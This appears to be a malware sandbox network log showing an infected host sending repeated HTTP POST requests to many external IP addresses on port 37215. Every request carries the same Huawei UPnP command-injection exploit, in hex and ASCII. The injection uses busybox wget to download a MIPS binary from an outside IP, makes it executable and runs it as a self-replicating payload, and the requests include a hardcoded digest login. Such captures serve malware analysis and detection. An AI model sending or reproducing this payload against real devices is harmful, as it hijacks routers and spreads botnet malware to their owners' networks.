3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1553192.168.2.13413462.96.179.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.585994005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1554192.168.2.1353366157.31.154.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586016893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1555192.168.2.1338432157.105.242.18337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586025953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1556192.168.2.1356100197.45.104.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586052895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1557192.168.2.134125674.185.203.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586062908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1558192.168.2.1348994157.241.109.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586110115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1559192.168.2.1348614197.28.228.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586112022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1560192.168.2.1338720197.5.87.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586119890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1561192.168.2.134513841.9.252.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586142063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1562192.168.2.134382841.124.24.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586153984 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1563192.168.2.133925419.227.97.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586173058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
